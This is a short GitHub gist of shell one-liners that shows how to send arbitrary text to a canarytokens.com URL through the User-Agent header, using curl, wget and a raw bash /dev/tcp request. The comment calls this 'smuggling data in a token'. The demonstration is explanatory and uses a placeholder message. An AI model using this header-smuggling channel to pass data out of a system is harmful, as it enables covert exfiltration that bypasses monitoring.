Skip to content

Instantly share code, notes, and snippets.

@Sawaba

Sawaba/useragent_smuggling_examples.sh

Created May 18, 2020 01:55
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Sawaba/2082f4827ffdbf91e3cb5f8fad4fb66d to your computer and use it in GitHub Desktop.
Save Sawaba/2082f4827ffdbf91e3cb5f8fad4fb66d to your computer and use it in GitHub Desktop.
Download ZIP
Raw
useragent_smuggling_examples.sh
curl -s -A "smuggled message" http://canarytokens.com/tokenurl
wget -U "smuggled message" http://canarytokens.com/tokenurl
exec 3<>/dev/tcp/canarytokens.com/80
echo -e "GET /articles/traffic/guln4qekd7zjfd4thw5sw48uh/post.jsp HTTP/1.1\r\nUser-Agent: If i trip my own token, i can pass it any useragent info i want to, effectively smuggling data in a token\r\nHost: canarytokens.com\r\nAccept: */*\r\n\r\n">&3
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment